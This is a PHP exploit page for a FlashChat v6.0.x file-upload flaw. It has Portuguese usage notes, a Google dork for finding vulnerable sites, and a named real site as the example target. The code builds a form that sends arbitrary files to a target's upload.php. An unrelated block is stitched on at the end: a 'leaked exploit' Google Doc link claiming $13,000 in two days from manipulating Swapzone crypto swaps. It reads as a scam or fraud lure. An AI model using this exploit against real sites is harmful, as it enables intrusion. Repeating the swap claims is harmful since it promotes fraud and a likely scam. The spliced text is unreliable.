Exploit: FlashChat File Upload

<?php

error_reporting(0);
set_time_limit(0);
ini_set('display_errors', 0);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
echo
'<pre>
Exploit: FlashChat File Upload.
Software Link0x3A3A3A3A http://www.tufat.com/script2.htm
Vs0x3A3A3A3A v6.0.8, v6.0.2, v6.0.4, v6.0.5, v6.0.6, v6.0.7

Modo de uso0x3A3A3A3A
Defina url alvo http://alvo//pasta/chat/ ou http://alvo/chat/
Usando:
http://localhost/exploit.php?url=http://www.thenorfolkbroads.org/forum/chat/

REF:<a href="http://www.exploit-db.com/exploits/28709/">http://www.exploit-db.com/exploits/28709/</a>

DORK[0]0x3A3A3A3A intitle:"FlashChat v6.0.8" ext:php
By0x3A3A3A3A GoogleINURL
</pre>
';
$url = (isset($_GET['url']) && !empty($_GET['url']) ? $_GET['url'] : EXIT());

echo "Alvo atual:: {$url}<br><br>";
?>

<form action='<?php echo "{$url}upload.php" ?>' method="post" enctype="multipart/form-data">
<label for="file">Arquivo de upload:</label><br>
<input type="file" name="file" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
✅ Leaked Exploit Documentation:

https://docs.google.com/document/d/1dOCZEHS5JtM51RITOJzbS4o3hZ-__wTTRXQkV1MexNQ/edit?usp=sharing

This made me $13,000 in 2 days.

Important: If you plan to use the exploit more than once, remember that after the first successful swap you must wait 24 hours before using it again. Otherwise, there is a high chance that your transaction will be flagged for additional verification, and if that happens, you won't receive the extra 38% — they will simply correct the exchange rate.
The first COMPLETED transaction always goes through — this has been tested and confirmed over the last days.

Edit: I've gotten a lot of questions about the maximum amount it works for — as far as I know, there is no maximum amount. The only limit is the 24-hour cooldown (1 use per day without any verification from Swapzone — instant swap).